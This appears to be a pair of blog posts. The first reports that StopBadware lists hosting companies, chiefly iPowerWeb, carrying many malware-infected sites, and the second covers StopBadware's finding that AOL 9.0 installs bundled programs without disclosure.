The Source of the Malware Scourge

Despite appearances, the U.S. is still the most popular place for the bad guys to place their malware code. has listed those Internet Service Providers that wittingly or unwittingly host “badware” — an umbrella term for any kind of software that insidiously installs itself on your computer. What’s interesting is that while there is one China company on the list, by far the biggest culprit is one iPowerWeb Inc, based in Phoenix, Arizona, which has more than 10,000 infected sites on their servers. (By comparison, then next biggest culprit has a quarter that.)

Badware is usually installed on a site without the owner’s knowledge, either by exploiting holes in the software that delivers content to the site or hacking into the site by guessing the owner’s password or making use of a hole in the server software. Victims would unwittingly download the badware by either visiting the website in question or be directed there from other websites which had been infected. Here’s a case of a fake MySpace page which lures victims to an iPowerWeb-hosted site where users give up their MySpace password. Interesting detail on how these work is here.

iPowerWeb appear to have a long history of attracting accusations that it doesn’t take this kind of thing seriously. Examples are here, here and here (from two years ago). So far there’s no press statement from iPowerWeb on its website; I’ve requested comment.

The sad thing here is that when Google and organisations like StopBadware find these hacked sites the sites are flagged and removed from Google searches, or else prefaced by a warning page. While this makes sense, it causes mayhem for the owners of these sites who are either not technically savvy enough to resolve the problem, or find themselves in limbo while their site is removed from the list after they’ve cleaned it up. A recent discussion of the problem on the stopbadware Google Group is here. (StopBadware says it will respond to appeals within 10 days and says the time is closer to two.)

One can only imagine the scale of the mess caused by all this. Hosting companies need to be smarter about monitoring this problem they’ll face declining custom or lawsuits.

Sneaky Software: AOL’s Bad

It seems that even the big players still don’t get it. StopBadware, a “neighborhood watch” for sneaky software, says that the latest (9.0) version of AOL software

installs additional software without telling the user, it forces the user to take certain actions, it adds various components to Internet Explorer and the taskbar without disclosure, it may automatically update without the user’s consent, and it fails to uninstall completely.

Pretty damning stuff. We know this kind of thing happens but this seems to be somewhat excessive. Most damning are the bundled programs installed without permission, or even informing the user: RealPlayer (surprise, surprise), QuickTime, AOL You’ve Got Pictures Screensaver, Pure Networks Port Magic, and Viewpoint Media Player. “During the installation process,” StopBadware says, “the user is never clearly notified that AOL will be installing these programs.”

StopBadware quotes AOL as saying that they are reviewing the report.

Companies have got to stop this kind of thing. This report is damning in that it’s clearly not just one oversight: The software has been designed to be as invasive as possible, to basically take over the user’s computer and steer them to all things AOL. That Apple and Real Networks allow themselves to be involved does not reflect on either well. And after some difficulty uninstalling it I’m beginning to have my suspicions about Network Magic (Pure Networks Port Magic is an AOL version of the software) too.